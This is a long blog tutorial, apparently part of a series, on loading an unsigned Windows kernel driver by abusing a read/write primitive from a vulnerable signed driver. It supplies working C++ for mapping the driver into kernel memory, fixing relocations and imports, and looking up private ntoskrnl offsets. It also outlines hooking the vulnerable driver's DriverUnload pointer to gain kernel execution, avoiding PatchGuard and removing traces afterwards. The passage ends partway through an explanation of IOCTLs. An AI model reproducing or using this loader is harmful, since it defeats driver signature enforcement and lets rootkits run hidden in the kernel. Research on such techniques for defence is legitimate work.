Loading an Unsigned Driver

Monday. July 01, 2024 - 68 mins

Loading An Unsigned Driver

A Quick Foreword

This blog turned out much longer than originally intended however I wanted to ensure that I discussed a lot of nuances and included everything in the load process for completeness. With that said, I hope you enjoy the blog and by the end you should know how to load your own unsigned driver! (Assuming you have an appropriate vulnerable driver lying around 😉)

Where We Left Off

Last time we looked at wrapping a kernel primitive from a vulnerable driver in some syntactic sugar to give us “translucent” access to kernel memory from usermode. In this blog we’ll explore how you actually use that kernel primitive to load your own unsigned driver!

Disclaimer: We’ll be using the IKernelPrimitiveProvider, KernelPtr & KernelRef classes we built in the last blog so if you haven’t given my previous blog a read I highly suggest it before continuing with this one!

A Common Starting Point

To find a clean platform from which we can walk through loading an unsigned driver we’ll start with a function that is given the essentials required to perform the load.

bool LoadUnsignedDriver(const std::unique_ptr<byte[]>& pFileBuffer, const KernelOffsets& offsets, std::shared_ptr<IKernelPrimitiveProvider> provider)

So what do we have?

pFileBuffer is a std::unique_ptr to a byte array containing the unsigned driver we wish to load
offsets is a KernelOffsets structure holding some private kernel offsets which we grabbed ahead of time which we will cover in just a second
provider is a std::shared_ptr holding a pointer to our IKernelPrimitiveProvider interface that we defined last time

Just before we jump into the loading code I want to draw your attention to the KernelOffsets structure. When loading an unsigned driver into the kernel we need to find a few things in ntoskrnl.exe that it doesn’t export publicly. One common practice for finding private symbols is scanning for byte sequences but I’m personally not a fan of how messy it can be, instead I prefer to use a lookup table to find the offsets for the specific hash of the kernel we’re loading against. If we don’t have an entry in our lookup table then we can error out early and report back that we don’t have an entry for this scenario. For completeness I’ll just cover the way this was done, although for our starting point function above we’ve assumed that we do have a KernelOffsets structure and the lookup has already been done.

In fact, before I get ahead of myself I’ll just explain what’s actually in our KernelOffsets structure and then later on in the loading code I’ll indicate what we needed that specific symbol for, but for now I’ll just show what symbols it actually contains.

In this case our KernelOffsets structure is defined as:

struct KernelOffsets
{
    // Called ObHeaderCookie in public symbols
    size_t rvaObHeaderCookie;

    // Called ObTypeIndexTable in public symbols
    size_t rvaObTypeIndexTable;

    // Called ObpRootDirectoryObject in public symbols
    size_t rvaObpRootDirectoryObject;
};

Okay, with that out of the way, back to a quick run through of the kernel offset lookup!

KernelOffset Lookup

For looking up a set of offsets for a specific version of ntoskrnl.exe it makes sense to key the map based on the Sha256 hash of ntoskrnl.exe. So our map structure is defined like so:

extern const std::map<std::string, KernelOffsets> kernel_offsets;

Then our definition looks something like:

const std::map<std::string, KernelOffsets> kernel_offsets =
{
    {
        "1ad490cc37aff28f00ace39f99d27bab11b1d9d36095409888d09db2b143571e",
        {.rvaObHeaderCookie = 0xCFC728, .rvaObTypeIndexTable = 0xCFCE60, .rvaObpRootDirectoryObject = 0xC259F8}
    },
    {
        "5788ef18e2cdbc8bdddf1ddfaf2975652df18c469e11db0d51c98970e6c4636e",
        {.rvaObHeaderCookie = 0xCFC728, .rvaObTypeIndexTable = 0xCFCE60, .rvaObpRootDirectoryObject = 0xC251E8}
    },
    {
        "d436d6bbf5b73a7fbade752d9d548326dc8ab464f27bf3dfda70f7fbe2d519a9",
        {.rvaObHeaderCookie = 0xCFC728, .rvaObTypeIndexTable = 0xCFCE60, .rvaObpRootDirectoryObject = 0xC259F8}
    },
    {
        "eace65a06bab6b67461ed29783cde9367c3ddd2a31b2594c59d22d77460d4f4b",
        {.rvaObHeaderCookie = 0xCFC72C, .rvaObTypeIndexTable = 0xCFCE80, .rvaObpRootDirectoryObject = 0xC259F8}
    }
};

So you can see for each version of ntoskrnl.exe we want to be able to load against we just need to add a map entry that connects the Sha256 of the ntoskrnl.exe image to a KernelOffsets structure containing the RVAs for the 3 private symbols we need. You’ll notice here I use designated initializers which allows us to easily see which RVA corresponds to which symbol. Without designated initializers each entry would look like:

{
        "d436d6bbf5b73a7fbade752d9d548326dc8ab464f27bf3dfda70f7fbe2d519a9",
        {0xCFC728, 0xCFCE60, 0xC259F8}
}

Which is “fine”, but now I have to go look at the definition of the KernelOffsets structure to figure out which RVA corresponds to which symbol. Now all we need is a handy function to compute the hash of a file which I’ve included below for completeness:

std::string HashFile(std::filesystem::path path)
{
    std::string retval;

    BCRYPT_ALG_HANDLE hAlg = NULL;

    NTSTATUS status = BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_SHA256_ALGORITHM, NULL, 0);

    if (STATUS_SUCCESS == status)
    {
        DWORD objLength = 0;
        ULONG bytesWritten = 0;

        status = BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, reinterpret_cast<PUCHAR>(&objLength), sizeof(objLength), &bytesWritten, 0);

        if (STATUS_SUCCESS == status && bytesWritten == sizeof(objLength) && 0 != objLength)
        {
            std::unique_ptr<byte[]> pFileBuffer = std::make_unique<byte[]>(1'000'000);
            std::unique_ptr<byte[]> pHashBuffer = std::make_unique<byte[]>(objLength);

            if (nullptr != pFileBuffer && nullptr != pHashBuffer)
            {
                DWORD hashLength = 0;
                bytesWritten = 0;

                status = BCryptGetProperty(hAlg, BCRYPT_HASH_LENGTH, reinterpret_cast<PUCHAR>(&hashLength), sizeof(hashLength), &bytesWritten, 0);

                if (STATUS_SUCCESS == status && bytesWritten == sizeof(hashLength) && 0 != hashLength)
                {
                    std::unique_ptr<byte[]> pHash = std::make_unique<byte[]>(hashLength);

                    if (nullptr != pHash)
                    {
                        BCRYPT_HASH_HANDLE hHash = NULL;

                        status = BCryptCreateHash(hAlg, &hHash, pHashBuffer.get(), objLength, NULL, 0, 0);

                        if (STATUS_SUCCESS == status && NULL != hHash)
                        {
                            std::ifstream input(path, std::ios::binary);

                            size_t bytesRead = input.read(reinterpret_cast<char*>(pFileBuffer.get()), 1'000'000).gcount();

                            while (bytesRead != 0 && STATUS_SUCCESS == status)
                            {
                                // Hash data
                                status = BCryptHashData(hHash, pFileBuffer.get(), static_cast<ULONG>(bytesRead), 0);

                                // Get next chunk
                                bytesRead = input.read(reinterpret_cast<char*>(pFileBuffer.get()), 1'000'000).gcount();
                            }

                            if (STATUS_SUCCESS == status)
                            {
                                // Successfully hashed all chunks
                                status = BCryptFinishHash(hHash, pHash.get(), hashLength, 0);

                                if (STATUS_SUCCESS == status)
                                {
                                    retval = bin_2_hex(std::span{pHash.get(), hashLength});
                                }
                            }

                            BCryptDestroyHash(hHash);
                        }
                    }
                }
            }
        }

        BCryptCloseAlgorithmProvider(hAlg, 0);
    }

    return retval;
}

You may have also noticed the call to bin_2_hex to convert our hash bytes to a hex string. This is just a helper function I wrote using the Windows API CryptBinaryToStringA which again I have included for completeness:

std::string bin_2_hex(std::span<byte> data)
{
    std::string retval;

    DWORD sizeRequired = 0;

    if (FALSE != CryptBinaryToStringA(&data[0], static_cast<DWORD>(data.size()), CRYPT_STRING_HEXRAW | CRYPT_STRING_NOCRLF, NULL, &sizeRequired) && 0 != sizeRequired)
    {
        std::unique_ptr<char[]> pBuffer = std::make_unique<char[]>(sizeRequired);

        if (FALSE != CryptBinaryToStringA(&data[0], static_cast<DWORD>(data.size()), CRYPT_STRING_HEXRAW | CRYPT_STRING_NOCRLF, pBuffer.get(), &sizeRequired) && 0 != sizeRequired)
        {
            retval = pBuffer.get();
        }
    }

    return retval;
}

For the hashing and hex string conversion we’re using Window’s BCrypt & WinCrypt libraries to avoid using an external dependencies, and now we can calculate the hash of ntoskrnl.exe like so:

std::string kernelHash = HashFile("C:\\Windows\\System32\\ntoskrnl.exe");

Then finally we can check if we have an entry for this hash:

if(kernel_offsets.contains(kernelHash))
{
    LoadUnsignedDriver(pFileBuffer, kernel_offsets.at(kernelHash), provider)
}
else
{
    // Report error indicating we don't have offsets for this version of ntoskrnl.exe
}

Alright, with our kernel offsets lookup code out of the way let’s get back to business and dive back into that load routine of ours!

Back to Business

The first point of order is to allocate memory in Kernel to load our unsigned driver into, however we first need to know how big of an allocation we need:

// Grab the DOS header of our unsigned driver
IMAGE_DOS_HEADER* pDosHeader = reinterpret_cast<IMAGE_DOS_HEADER*>(pFileBuffer.get());

// Now grab the NT headers
IMAGE_NT_HEADERS* pNtHeader = reinterpret_cast<IMAGE_NT_HEADERS*>(pFileBuffer.get() + pDosHeader->e_lfanew);

// This entire allocation is modifiable & executable so there's no need for setting any kind of memory protections
KernelPtr ptr = provider->KernelAllocate(pNtHeader->OptionalHeader.SizeOfImage);

As always the keen-eyed among you may have noticed the assumption I make with the line:

IMAGE_NT_HEADERS* pNtHeader = reinterpret_cast<IMAGE_NT_HEADERS*>(pFileBuffer.get() + pDosHeader->e_lfanew);

Can you spot it?

There are actually two separate definitions of IMAGE_NT_HEADERS , one for x64 (IMAGE_NT_HEADERS64) and one for x86 (IMAGE_NT_HEADERS32) , this is because the structure contains the optional header which differs in size between x86 and x64. The Windows definition for IMAGE_NT_HEADERS just defaults to the same architecture as the binary is targeting. So the assumption here is that the loader itself is built for x64. In fact I should have stated at the start of this blog that we’re targeting an x64 build of Windows i.e. a 64-bit kernel, however almost all machines these days are 64-bit so I thought it unnecessary. So to be clear:

This blog assumes we are loading a 64-bit unsigned driver on a 64-bit Windows system using a loader that is also built as x64.

I digress, however the code above is merely peaking into the NT headers to pull the unsigned driver’s SizeOfImage field which as Microsoft states, is:

The size (in bytes) of the image, including all headers, as the image is loaded in memory. It must be a multiple of SectionAlignment.

So this is the amount of space we need in kernel to load our unsigned driver. Now, as a side note, the kernel primitive we currently abuse, which is not included in this blog, allocates memory in kernel using MmAllocateContiguousMemory. This API allocates RWX memory so we don’t have to worry about memory protections at all. Luckily, most drivers are written using the old school API’s such as ExAllocatePool which unless you explicitly specify you want to return non-executable (NX) memory, will by default return executable memory. So there is usually no shortage of vulnerable drivers that can provide you with an executable allocation.

Back to Business Again…

With my anecdotes about bitness and old-school APIs out of the way let’s get into the meaty part of the loading process! So now that we have our KernelPtr object that points to our new kernel allocation, we can begin mapping our unsigned driver into kernel!

// Copy in the PE headers - This uses a KernelRef assignment operator to write the contents of the std::span into kernel (see below)
*ptr = std::span<byte>(pFileBuffer.get(), pNtHeader->OptionalHeader.SizeOfHeaders);

// Next copy the sections
IMAGE_SECTION_HEADER* pFirstSection = IMAGE_FIRST_SECTION(pNtHeader);
for (int i = 0; i < pNtHeader->FileHeader.NumberOfSections; i++)
{
    /*
        Adding to our KernelRef & KernelPtr from last time:
        
        I added a set method to the KernelPtr method that allows us to pass it an RVA and it'll add that RVA
        to the allocation base and move itself to that absolute address. I then also added an overload to the
        KernelRef object to be assignable from a std::span<byte> which simply writes the binary data referenced
        by the span to the address pointed to by the KernelPtr. So in this line:
        
        1. We use the KernelPtr set method to pass it an RVA and get it to move to the kernel address of BaseAddress + RVA
        2. We use the dereference operator * to convert the KernelPtr to a KernelRef
        3. We use the std::span<byte> assignment operator to write the binary data into kernel
    */
    *ptr.set(pFirstSection->VirtualAddress) = std::span<byte>(pFileBuffer.get() + pFirstSection->PointerToRawData, pFirstSection->SizeOfRawData);
    pFirstSection++;
}

// Now we need to apply relocations
IMAGE_DATA_DIRECTORY relocDir = pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];

// Do we have any to do?
if (0 != relocDir.Size && 0 != relocDir.VirtualAddress)
{
    // Delta is allocation base minus intended base (actually doesn't matter which way around
    // as long as we store it as a signed type and use additon when processing relocs)
    std::ptrdiff_t delta = reinterpret_cast<INT_PTR>(ptr.base()) - pNtHeader->OptionalHeader.ImageBase;

    // Yes, okay let's process each block in the data directory
    for (DWORD relocInfoRva = relocDir.VirtualAddress; relocInfoRva < relocDir.VirtualAddress + relocDir.Size;)
    {
        // To avoid excessive kernel reads we'll use the reloc table from the unloaded copy
        DWORD relocFa = RvaToFileOffset(pFileBuffer, relocInfoRva);

        if (0 != relocFa)
        {
            IMAGE_BASE_RELOCATION baseRelocBlock = *reinterpret_cast<IMAGE_BASE_RELOCATION*>(pFileBuffer.get() + relocFa);

            // Create a span to easily iterate over the relocs
            std::span<WORD> typeOffsetPairs(reinterpret_cast<WORD*>(pFileBuffer.get() + relocFa + sizeof(IMAGE_BASE_RELOCATION)), (baseRelocBlock.SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD));

            for (int i = 0; i < typeOffsetPairs.size(); i++)
            {
                WORD typeOffsetPair = typeOffsetPairs[i];

                WORD type = (typeOffsetPair >> 12) & 0xF;
                WORD offset = typeOffsetPair & 0xFFF;
                                
                // Block Rva + Offset into page
                DWORD rva = baseRelocBlock.VirtualAddress + offset;

                // Process each reloc type differently
                switch (type)
                {
                case IMAGE_REL_BASED_ABSOLUTE:
                    // Nothing to do here
                    break;
                case IMAGE_REL_BASED_HIGH:
                    *ptr.set(rva) += HIWORD(static_cast<DWORD>(delta));
                    break;
                case IMAGE_REL_BASED_LOW:
                    *ptr.set(rva) += LOWORD(static_cast<DWORD>(delta));
                    break;
                case IMAGE_REL_BASED_HIGHLOW:
                    *ptr.set(rva) += static_cast<DWORD>(delta);
                    break;
                case IMAGE_REL_BASED_HIGHADJ:
                    /*
                            For this one we need to compose a 32-bit value
                        from the high bytes stored at the fixup rva and
                        the low bytes which are in the next WORD
                        Set ptr & read HIWORD
                    */
                    {
                        WORD hiWord = *ptr.set(rva);
                        DWORD composition = (hiWord << 16);
                        // Get LOWORD from next entry
                        composition += typeOffsetPairs[++i];
                        // Now add delta
                        composition += static_cast<DWORD>(delta);
                        // Now add hiword resulting from arithmetic
                        *ptr = HIWORD(static_cast<DWORD>(composition));
                    }
                    break;
                case IMAGE_REL_BASED_DIR64:
                    *ptr.set(rva) += delta;
                    break;
                }
            }

            // Move to next block
            relocInfoRva += baseRelocBlock.SizeOfBlock;
        }
        else
        {
            // Issue!
            throw std::runtime_error("failed to convert rva to file offset");
        }
    }
}

Okay, quick pause in the code here because there’s a few things to unpack. Copying the headers and sections into our kernel allocation is fairly trivial however the relocationss are slightly more complicated. One of our optimizations here to avoid excessive kernel reads is to parse the relocation information from the copy of the unsigned driver we have in memory in user mode. However we have a slight issue in the fact that our user-mode copy isn’t mapped, and all of the relocation fixup data is stored in terms of RVAs (Relative Virtual Addresses). This is much easier when working on mapped images, however for us we need to convert each RVA to its equivalent location in the unmapped buffer. To do this we use a function called RvaToFileOffset which looks something like:

DWORD RvaToFileOffset(const std::unique_ptr<byte[]>& pFileBuffer, DWORD rva)
{
    DWORD fileOffset = 0;
    IMAGE_DOS_HEADER* pDosHeader = reinterpret_cast<IMAGE_DOS_HEADER*>(pFileBuffer.get());
    IMAGE_NT_HEADERS* pNtHeader = reinterpret_cast<IMAGE_NT_HEADERS*>(pFileBuffer.get() + pDosHeader->e_lfanew);
    IMAGE_SECTION_HEADER* pSection = IMAGE_FIRST_SECTION(pNtHeader);
    
    for (int i = 0; i < pNtHeader->FileHeader.NumberOfSections; i++)
    {
        if (pSection->VirtualAddress <= rva && rva < pSection->VirtualAddress + pSection->Misc.VirtualSize)
        {
            // Offset into the section
            DWORD offsetRva = rva - pSection->VirtualAddress;
            // Add offset to raw section offset
            fileOffset = pSection->PointerToRawData + offsetRva;
            break;
        }
        pSection++;
    }
    
    return fileOffset;
}

Essentially what we do is walk the headers until we get to the IMAGE_SECTION_HEADER structures. We then iterate over them until we find a section RVA range that contains our RVA. Once we find the containing section we can convert our RVA into an offset into that section, we can finally add that offset to the PointerToRawData field which signifies where the data is stored in the file. The resulting value is the offset into the unmapped file that we’re interested in. Using this method allows us to minimise the volume of calls into the driver. This isn’t always necessary but in cases where the kernel primitives may have some side effects it’s useful to only call into the kernel when we need to. We could have even taken it a step further by fixing up the relocations in user mode before copying the sections into kernel however this would have been even more work so has been left for now. Our final step now in the loading process is to resolve the unsigned driver’s import table!

// Let's start resolving imports
IMAGE_DATA_DIRECTORY importDir = pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];

// Read from the file buffer to minimise kernel read/write
DWORD importFa = RvaToFileOffset(pFileBuffer, importDir.VirtualAddress);

IMAGE_IMPORT_DESCRIPTOR* pImport = reinterpret_cast<IMAGE_IMPORT_DESCRIPTOR*>(pFileBuffer.get() + importFa);

// While this isn't the null entry
while (pImport->OriginalFirstThunk)
{
    // Grab the module name
    DWORD nameFa = RvaToFileOffset(pFileBuffer, pImport->Name);
    std::string moduleName = reinterpret_cast<char*>(pFileBuffer.get() + nameFa);

    // Attempt to grab the system image base address
    void* pImageBase = KGetModuleHandle(moduleName);

    if (nullptr != pImageBase)
    {
        // We can lookup in the driver buffer but we need to write to the kernel
        DWORD lookupFa = RvaToFileOffset(pFileBuffer, pImport->OriginalFirstThunk);
        IMAGE_THUNK_DATA* lookup = reinterpret_cast<IMAGE_THUNK_DATA*>(pFileBuffer.get() + lookupFa);
        // Move kernel ptr to correct rva
        ptr.set(pImport->FirstThunk);

        for (; 0 != lookup->u1.Function; lookup++, ptr += sizeof(IMAGE_THUNK_DATA))
        {
            // Assume import by name rather than ordinal
            DWORD hintNameFa = RvaToFileOffset(pFileBuffer, static_cast<DWORD>(lookup->u1.Function));
            IMAGE_IMPORT_BY_NAME* pNameData = reinterpret_cast<IMAGE_IMPORT_BY_NAME*>(pFileBuffer.get() + hintNameFa);

            std::string funcName = pNameData->Name;

            // Walk the export table in kernel
            void* pKernelLandFunc = KGetProcAddress(provider, pImageBase, funcName);

            if (nullptr != pKernelLandFunc)
            {
                // Now store that result in the kernel import table
                *ptr = pKernelLandFunc;
            }
            else
            {
                throw std::runtime_error("failed to lookup kernel function: " + funcName + " in module: " + moduleName);
            }
        }
    }
    else
    {
        throw std::runtime_error("failed to get kernel module base address: " + moduleName);
    }

    // Move to next entry in directory table
    pImport++;
}

This code is all fairly standard for PE loading, however again like for the relocations we walk the import table of the unmapped driver buffer in user mode to save a few more kernel reads. The two functions to take note of here however are our implementations of KGetModuleHandle & KGetProcAddress . Like GetModuleHandle & GetProcAddress they are used to resolve the addresses of kernel mode drivers and their exports. Let’s start by taking a look at KGetModuleHandle :

void* KGetModuleHandle(const std::string& module)
{
    void* pModuleBase = nullptr;

    HMODULE hNtDll = GetModuleHandleA("ntdll.dll");

    if (NULL != hNtDll)
    {
        fnZwQuerySystemInformation pZwQuerySystemInformation = reinterpret_cast<fnZwQuerySystemInformation>(GetProcAddress(hNtDll, "ZwQuerySystemInformation"));

        if (NULL != pZwQuerySystemInformation)
        {
            ULONG bytesReturned = 0;
            ULONG bufferSize = 0x1000;
            std::unique_ptr<byte[]> pBuffer = std::make_unique<byte[]>(bufferSize);

            NTSTATUS status = pZwQuerySystemInformation(SystemModuleInformation, pBuffer.get(), bufferSize, &bytesReturned);

            while (STATUS_INFO_LENGTH_MISMATCH == status)
            {
                // Increase the buffer size
                bufferSize *= 2;
                pBuffer = std::make_unique<byte[]>(bufferSize);
                // Reset params
                bytesReturned = 0;
                // Try again
                status = pZwQuerySystemInformation(SystemModuleInformation, pBuffer.get(), bufferSize, &bytesReturned);
            }

            if (NT_SUCCESS(status))
            {
                SYSTEM_MODULE_INFORMATION* pModuleInfo = reinterpret_cast<SYSTEM_MODULE_INFORMATION*>(pBuffer.get());

                for (ULONG i = 0; i < pModuleInfo->Count; i++)
                {
                    if (0 == _stricmp(reinterpret_cast<char*>(pModuleInfo->Module[i].FullPathName + pModuleInfo->Module[i].OffsetToFileName), module.c_str()))
                    {
                        pModuleBase = pModuleInfo->Module[i].ImageBase;
                        break;
                    }
                }
            }
            else
            {
                throw std::runtime_error("failed to query system modules");
            }
        }
        else
        {
            throw std::runtime_error("failed to locate function ZwQuerySystemInformation");
        }
    }
    else
    {
        throw std::runtime_error("failed to get a handle to NtDll");
    }

    return pModuleBase;
}

Here the crux of the lookup is based on an API called “ZwQuerySystemInformation”, which is also exported as “NtQuerySystemInformation”. The documentation from Microsoft can be found here. This API is not declared in the Windows headers, however it is still exported by ntdll.lib, so if you write you’re own declaration in a header then link ntdll.lib you should be able to call it like any normal Windows API, however for simplicity we resolve it dynamically using LoadLibrary & GetProcAddress. This API is used to retrieve a variety of system information as the name suggests, the type of which is indicated by the first parameter “SystemInformationClass”, which is an enumeration defining all of the different system information which can be queried. I have included the type declaration here for convenience:

using fnZwQuerySystemInformation = NTSTATUS(WINAPI*)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

Luckily for us one value in the SYSTEM_INFORMATION_CLASS enumeration is SystemModuleInformation = 0x0B which queries all loaded kernel modules. The data is returned in a structure defined as follows:

typedef struct _SYSTEM_MODULE_INFORMATION
{
    ULONG Count;
    SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

where SYSTEM_MODULE_ENTRY is defined as:

typedef struct _SYSTEM_MODULE_ENTRY
{
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;

Now, you might be looking as the SYSTEM_MODULE_INFORMATION structure and be wondering why it only has an array of length 1 for the Module array. This is actually a fairly common structure pattern where we have a count that actually indicates how big the array is and the array definition is there so that when we know the count we can index beyond the bounds of the defined array but the type is still defined for us. So the structure really just acts as a header for a larger memory allocation. Now, we have no idea how many entries the array needs to have because we have no easy way of knowing how many modules are loaded in kernel, so we call this API in a loop checking for STATUS_INFO_LENGTH_MISMATCH which indicates to us that our buffer still isn’t big enough to hold the information that we are asking for, so in that case we can double the size of our buffer and query again. Finally when our buffer is large enough, hopefully the call succeeds (or reports a different error). Assuming we have a successful call we can then walk over our array of kernel modules looking for the specific module we care about by comparing against the filename! Now, the way in which the file name is stored in the SYSTEM_MODULE_ENTRY is by indicating the offset into the full path at which the file name starts. For example, assume the full path for our kernel module is C:\Windows\System32\drivers\ntfs.sys, rather than store the file name ntfs.sys separately the structure just uses the OffsetToFileName field to indicate that the string ntfs.sys starts 28 characters into the FullPathName string. Given that our driver’s import table only references its imported modules by filename we step over the full path and just string compare against the filename. This is making the small assumption that we don’t have any kernel modules loaded with the same filename however this is essentially always the case. If you wanted to be overly pedantic and you knew that your unsigned driver only imported from Windows signed kernel modules such as cng.sys, then you could also check that when your filename matches that the file is also at the path you expect i.e. C:\Windows\System32\drivers. Now, I have no idea why this information is exposed to user-mode, however once we have located the kernel module we care about the structure also helpfully indicates the loaded modules ImageBase.

To summarize, we dynamically resolve the Windows API ZwQuerySystemInformation, use it to query the SystemModuleInformation, walk the list of kernel modules looking for the module we care about by filename, then we extract the ImageBase from the SYSTEM_MODULE_ENTRY structure. This allows us to find the base address of any module in kernel. Now, this is only half the battle. Once we have the base address of the kernel module, we then need to be able to locate the address of functions exported by it, so let’s now turn our attention to KGetProcAddress:

void* KGetProcAddress(std::shared_ptr<IKernelPrimitiveProvider> provider, void* pModuleBase, const std::string& exportName)
{
    void* retval = nullptr;

    // Grab a KernelPtr object to make memory access easier
    KernelPtr ptr(pModuleBase, provider);
        
    // Walk the driver headers to find the export data directory
    IMAGE_DOS_HEADER dosHeader = *ptr;
    ptr += dosHeader.e_lfanew;

    IMAGE_NT_HEADERS ntHeader = *ptr;
    IMAGE_DATA_DIRECTORY exportDataDir = ntHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

    // Set via rva
    ptr.set(exportDataDir.VirtualAddress);
    
    // Read the export directory structure
    IMAGE_EXPORT_DIRECTORY exportDir = *ptr;

    // Walk the name pointer table to search by name 
    for (DWORD i = 0; i < exportDir.NumberOfNames; i++)
    {
        // Grab the name RVA
        DWORD nameRva = *ptr.set(exportDir.AddressOfNames + i * sizeof(DWORD));
        // Grab the actual name
        std::string exportedName = *ptr.set(nameRva);

        if (exportedName == exportName)
        {
            // Woo we found it, lookup the associated ordinal
            DWORD ordinalRva = exportDir.AddressOfNameOrdinals + i * sizeof(USHORT);
            USHORT ordinal = *ptr.set(ordinalRva);
                        
            // Calculate the actual function address
            DWORD funcAddrRva = exportDir.AddressOfFunctions + ordinal * sizeof(DWORD);
            DWORD funcRva = *ptr.set(funcAddrRva);

            retval = reinterpret_cast<byte*>(pModuleBase) + funcRva;

            break;
        }
    }

    return retval;
}

We actually have multiple options here, if we wanted to avoid accessing kernel memory again we could use the full path given to us by ZwQuerySystemInformation earlier and walk the export table of each kernel module by reading it directly from disk, however like our relocation code from earlier its more complicated and time consuming to go reading every driver from disk so for now we’ll stick to parsing the PE headers in kernel.

Okay, let’s recap!

We have:

Allocated our PE memory region in kernel
Copied in the PE headers
Copied in the PE sections
Processed the PE relocations
Processed the PE imports

The only thing we arguably haven’t done yet is register the unsigned driver’s exception data (if it has any) to the inverted function tables which is necessary for SEH to work in the driver (in its current state if it throws an exception it’ll blue screen the box). This step is a bit more complicated and requires calling functions in kernel space so we’ll defer this work to when we actually have execution in kernel! So what’s left?

Getting Execution in Kernel!

Turning a kernel memory primitive into execution isn’t particularly trivial, the standard approach is patch some hook into a somewhat unused function in kernel somewhere and trigger a call to it from user-mode. The issue with this is there is no guarantee that the hook won’t be triggered multiple times so suddenly you have some rather unpleasant concurrency issues you may have to deal with. You also want to avoid patching any memory that would trigger Kernel Patch Protection (KPP also known as PatchGuard) which is a kernel system that periodically & randomly checks various regions of memory haven’t been tampered with. Triggering PatchGuard will result in a BSOD (blue screen of death) and crash the machine. Although the patch will only be written in for a short period of time, and you’d be unlikely to trigger a PatchGuard fault, I’m personally not a gambling man and prefer a more stable option.

The question then becomes, what part of kernel likely isn’t being used by anyone else and also isn’t protected by PatchGuard?

The first answer may not be immediately obvious but what about the vulnerable driver we loaded for the kernel primitive?! Given that we loaded it to exploit our way into kernel I think we can be fairly confident nothing else on the system is using it! Okay perfect! But what part of the vulnerable driver can we patch? Say it with me: The DRIVER_OBJECT structure!!!

Woahh slow down there, what is the DRIVER_OBJECT structure?

Okay, backtracking slightly, when a driver is loaded normally into kernel it has to expose a DriverEntry function akin to a user-mode dll’s DllMain function. The function prototype for a DriverEntry looks something like:

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)

You can read about DRIVER_OBJECT structure here & the requirements & responsibilities of a DriverEntry function here! To summarize:

The I/O manager creates a DRIVER_OBJECT structure for each driver that has been installed and loaded.
The I/O manager passes this structure to the driver’s DriverEntry routine during initialization.
The DriverEntry routine is responsible for filling out parts of this structure such as the MajorFunction array pointing to its dispatch routines for IRP_MJ_XXX requests.
If a driver supports being unloaded it can also fill out it’s DriverUnload field in the DRIVER_OBJECT structure.
The I/O manager uses the DRIVER_OBJECT structure to register and track information about the loaded images of drivers.

There’s a couple of interesting candidates for us to patch here!

If a driver registers a device to allow I/O control codes to be sent to it from user-mode then it is guaranteed to have filled out the entry in the MajorFunction table corresponding to IRP_MJ_DEVICE_CONTROL. Additionally if a driver supports being unloaded (which the majority do), then it will have also filled out its DriverUnload routine.

A quick aside on PatchGuard: PatchGuard is largely undocumented (which is sort of the point), although quite a few people have worked on reverse engineering the code and structures to understand how it works. From what I can tell PatchGuard does protect the DRIVER_OBJECT structure of at least some drivers although I believe its only core Windows drivers whose DRIVER_OBJECT structures are initialized early in the Windows load process, and have no need to change, such as ntfs.sys. I don’t currently think that 3rd party drivers’ DRIVER_OBJECT structures are protected by PatchGuard but I don’t want to make that claim in this blog given that I am not 100% certain.

Given that we likely want to unload our vulnerable driver when we’re done to remove any traces of our unsigned driver having been loaded I decided to go down the route of hooking the DriverUnload routine in the DRIVER_OBJECT structure. So how do we find where this DRIVER_OBJECT structure is? Well, this turned into a much bigger adventure than I originally anticipated! Most DriverEntry routines will often save off a pointer to their DRIVER_OBJECT structure which means that as long as you know where your vulnerable driver is and you know the RVA at which it saves off this pointer is, it would be trivial to find, however not all drivers do this and I don’t want to make that assumption in this blog, so the alternative is we use a method that should work for all vulnerable drivers but is a bit more involved….

Driver Devices

I’ve made a few assumptions about your (the readers) knowledge, frankly, trying to write this blog from the standpoint of assuming you know nothing about Windows or what the kernel is would probably be novel worthy (and to be honest this blog is getting that way already). Given I’ve assumed you have a kernel primitive to hand I also assumed you probably knew about driver device objects and IOCTLs (I/O Control Codes) but in the interest of keeping this blog as available as possible to the widest audience possible I’ll do a quick recap here.

When writing a driver you often want to expose functionality to user-mode. For example, say a motherboard manufacturer has some RGB LED’s on the board and they want to allow the user to change the colour. Typically you’d need a motherboard driver that can talk to the hardware to tell it what colour

the LED needs to be but you’d probably ship a fancy user-mode GUI so that its easy for end users to change that colour. So you have some functionality available in the kernel that you want to expose to user-mode. This is typically implemented via device I/O control codes or IOCTLS for short. So how does this work?

In Kernel

In your driver’s DriverEntry routine you call IoCreateDevice to create a device & an associated DEVICE_OBJECT structure. A device object represents a logical, virtual or physical device for which a driver handles I/O requests. Referring back to our example our motherboard driver would want to create a motherboard device object for which it can handle I/O requests. You can read more about this here.
You call IoCreateSymbolicLink to create a symbolic link for the device which is accessible from user-mode.
You populate the DRIVER_OBJECTS MajorFunction table to handle IRP_MJ_CREATE/IRP_MJ_CLOSE requests for dealing with handles being opened and closed for the driver’s device and then you also populate the dispatch routine for handling IRP_MJ_DEVICE_CONTROL requests which is the dispatch routine fired for when IOCTLS are sent to your device.

In User-Mode

You call CreateFile to open a handle to the device represented by the symbolic link i.e. \.\MotherboardLink which is a symbolic link for \Device\Motherboard
You then call DeviceIoControl using that handle to send control codes (along with an in and/or out buffer) to the device object
These control codes will then be handled in kernel by the dispatch routine registered for IRP_MJ_DEVICE_CONTROL. So in our example the motherboard driver will likely have a special control code for changing the LED colour and the buffer sent down to the driver may simply have the RGB values stored in it.

